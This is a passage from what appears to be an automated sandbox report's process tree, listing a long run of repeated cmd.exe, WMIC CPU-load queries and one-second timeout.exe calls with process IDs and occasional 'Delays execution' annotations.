    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2260
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2304
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1328
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2260
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4796
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:72
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2388
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3696
